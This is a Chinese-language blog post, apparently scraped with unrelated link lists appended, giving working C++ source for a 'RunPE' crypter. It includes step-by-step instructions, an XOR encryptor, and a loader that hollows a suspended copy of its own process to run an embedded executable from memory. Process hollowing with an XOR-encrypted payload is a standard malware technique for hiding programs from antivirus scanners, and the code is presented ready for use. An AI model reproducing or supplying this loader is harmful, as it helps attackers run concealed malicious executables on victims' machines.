内存中运行文件

拿exe并在HxD或010中打开 - cntrl+a copy as C

粘贴到encrypt.cpp

编译并运行encrypt.cpp - 创建shellcode.txt

从shellcode.txt复制char数组,并替换runPE.cpp中的rawData []

编译生成最终的runPE.exe

使用XOR密钥解密,加载到内存中执行。

encrypt.cpp

//encrypt shellcode prior to storing in stub

//store in shellcodeEncrypted.txt

//copy into runPE.cpp

#include <iostream>

#include <fstream>

#include <string>

using namespace std;

//Real PE shellcode dump here - fix length also

const int length = 2;

unsigned char rawData[length] = {

	0x00, 0xff

};

void crypt(unsigned char rawData[], int length)

{

	char key = 0x42;

	for (int i = 0; i < length; i++)

	{

		rawData[i] = (char)(rawData[i] ^ key);

	}

}

struct HexCharStruct

{

	unsigned char c;

	HexCharStruct(unsigned char _c) : c(_c) { }

};

inline std::ostream& operator<<(std::ostream& o, const HexCharStruct& hs)

{

	return (o << std::hex << (int)hs.c);

}

inline HexCharStruct hex(unsigned char _c)

{

	return HexCharStruct(_c);

}

int main()

{

	ofstream output;

	output.open("shellcodeEncrypted.txt");

	crypt(rawData, length);

	output << "unsigned char rawData[" << to_string(length) << "]" \

		<< " = { ";

	for (int i = 0; i < length; i++)

	{

		output << "0x" << hex(rawData[i]) << ",";

		if (i % 20 == 0)

		{

			output << endl;

		}

	}

	output << "};";

}

RunPE.cpp

#include <iostream> // Standard C++ library for console I/O

#include <string> // Standard C++ Library for string manip

#include <fstream>

#include <Windows.h> // WinAPI Header

#include <TlHelp32.h> //WinAPI Process API

// use this if you want to read the executable from disk

HANDLE MapFileToMemory(LPCSTR filename)

{

	std::streampos size;

	std::fstream file(filename, std::ios::in | std::ios::binary | std::ios::ate);

	if (file.is_open())

	{

		size = file.tellg();

		char* Memblock = new char[size]();

		file.seekg(0, std::ios::beg);

		file.read(Memblock, size);

		file.close();

		return Memblock;

	}

	return 0;

}

int RunPortableExecutable(void* Image)

{

	IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols

	IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols

	IMAGE_SECTION_HEADER* SectionHeader;

	PROCESS_INFORMATION PI;

	STARTUPINFOA SI;

	CONTEXT* CTX;

	DWORD* ImageBase; //Base address of the image

	void* pImageBase; // Pointer to the image base

	int count;

	char CurrentFilePath[1024];

	DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable

	NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize

	GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable

	if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.

	{

		ZeroMemory(&PI, sizeof(PI)); // Null the memory

		ZeroMemory(&SI, sizeof(SI)); // Null the memory

		if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,

			CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current

													 //process in suspended state, for the new image.

		{

			// Allocate memory for the context.

			CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));

			CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

			if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread

			{

				// Read instructions

				ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);

				pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),

					NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

				// Write the image to the process

				WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

				for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)

				{

					SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));

					WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),

						LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);

				}

				WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),

					LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

				// Move address of entry point to the eax register

				CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;

				SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context

				ResumeThread(PI.hThread); //´Start the process/call main()

				return 0; // Operation was successful.

			}

		}

	}

}

// enter valid bytes of a program here.

//Using 010 Hex editor or HxD - copy all as C hex works perfectly. A complete hexdump, no magic ;)

void decrypt(unsigned char rawData[], int length)

{

	char key = 0x42;

	for (int i = 0; i < length; i++)

	{

		rawData[i] = (char)(rawData[i] ^ key);

	}

}

//Place encrypted shellcode here - fix length also!

const int length = 2;

unsigned char rawData[length] = {

	0x00, 0x00

};

int main()

{

	decrypt(rawData, length);

	RunPortableExecutable(rawData); // run executable from the array

	getchar();

}

内存运行PE文件的更多相关文章

  1. 深入学习PE文件(转)

    PE文件是Win32的原生文件格式.每一个Win32可执行文件都遵循PE文件格式.对PE文件格式的了解可以加深你对Win32系统的深入理解. 一. 基本结构. 上图便是PE文件的基本结构.(注意:DO ...

  2. 深入剖析PE文件

    不赖猴的笔记,转载请注明出处. 深入剖析PE文件 PE文件是Win32的原生文件格式.每一个Win32可执行文件都遵循PE文件格式.对PE文件格式的了解可以加深你对Win32系统的深入理解. 一.   ...

  3. PE文件简介

    PE文件的全称是Portable Executable,意为可移植的可执行的文件,常见的EXE.DLL.OCX.SYS.COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接 ...

  4. PE 文件

    一.PE文件基本结构 上图便是PE文件的基本结构.(注意:DOS MZ Header和部分PE header的大小是不变的:DOS stub部分的大小是可变的.) 二.Section 详解 一个PE文 ...

  5. 文件中pe到内存中pe

    前言 学pe的时候被困扰了很久,终于在某处给我找到了,打算打出来读一读代码 这边我们是从文件中的pe转到运行中的pe,然后再缩小存储到文件的pe 这边我们需要知道内存中对齐是0x1000,文件对齐是0 ...

  6. 打造XP下可运行的微型PE文件

    前几天和朋友交流技术,提到手工打造微型PE文件,他说现在网上流传的大部分版本在XP SP3下都不能运行,于是心血来潮,拍着胸脯说:“你放心,忙完了帮你做一个.”后来花了半天时间,终于打造出一个XP下可 ...

  7. PE文件从文件加载到内存,再从内存读取,然后存盘到文件

    // mem.cpp : 定义控制台应用程序的入口点. //PE文件从文件加载到内存,再从内存读取,然后存盘到文件 #include "stdafx.h" #include < ...

  8. 分配粒度和内存页面大小(x86处理器平台的分配粒度是64K,内存页是4K,所以section都是0x1000对齐,硬盘扇区大小是512字节,所以PE文件默认文件对齐是0x200)

    分配粒度和内存页面大小 x86处理器平台的分配粒度是64K,32位CPU的内存页面大小是4K,64位是8K,保留内存地址空间总是要和分配粒度对齐.一个分配粒度里包含16个内存页面. 这是个概念,具体不 ...

  9. 浅析MSIL中间语言——PE文件结构篇

    一.开篇 开篇我想讲一下于本文无关的话题,其实我很想美化一下自己博客园一直没时间弄,无意间找了博客园李宝亨的博客园里面有一篇分享自己主题的文章,我就将这个模板暂时用作我的blog主题,我要讲述一个关于 ...

随机推荐

  1. 鼠标常用样式(cursor)

    <body> <div>常用的鼠标样式(cursor):pointer,move,defalt,text(火狐不支持hand)</div> </body> ...

  2. leetcode解题报告(32):Teemo Attacking

    描述 In LLP world, there is a hero called Teemo and his attacking can make his enemy Ashe be in poison ...

  3. CStatic 控件设置文本,不能重回问题

    CStatic m_page_text_; m_page_text_.SetWindowText(str); CRect rt; m_page_text_.GetWindowRect(&rt) ...

  4. Java 获取客户端真实IP地址

    本文基于方法 HttpServletRequest.getHeader 和 HttpServletRequest.getRemoteAddr 介绍如何在服务器端获取客户端真实IP地址. 业务背景 服务 ...

  5. Ubuntu16.04忘记MySQL5.7的root用户密码之解决方案

    其实也就四步,如下: 修改配置文件 sudo vimi /etc/mysql/mysql.conf.d/mysqld.cnf 并在 在[mysqld]下方的skip-external-locking下 ...

  6. Git的使用(1) —— 版本库

    1. 简介 Git作为一个分布式版本控制系统,其优点是不需要一直连接远端版本库就可以使用. 故其为实现分布版本控制专门设计了一整套的存储区间和语句,用来实现. (1) 本地版本库:建立在本机磁盘上的文 ...

  7. ubuntu之路——day4(今天主要看了神经网络的概念)

    感谢两位老师做的免费公开课: 第一个是由吴恩达老师放在网易云课堂的神经网络和深度学习,比较偏理论,使用numpy包深入浅出的介绍了向量版神经网络的处理方式,当然由于视频有点老,虽然理论很好但是工具有点 ...

  8. 三大框架 之 Hibernate生成策略与缓存策略(主键生成策略、持久化、持久化类划分、一级缓存、事物管理)

    目录 Hibernate生成策略与缓存策略 主键生成策略 主键分类 主键的生成策略 持久化 什么是持久化 什么是持久化类 持久化类编写规则 持久化类的划分 三种状态区分 持久态对象特征 一级缓存 什么 ...

  9. cropper手机使用实例

    cropper手机使用实例 一.总结 一句话总结: 启示:还是要多个相关的实例交叉使用,相互印证,查漏补缺,可以更加高效和方便和节约时间 二.Cropper.js从前台到后台的完整实例应用 转自或参考 ...

  10. Spring’s RestTemplate

    Spring’s RestTemplate /** * After the word document is generated in memory we can upload it to the s ...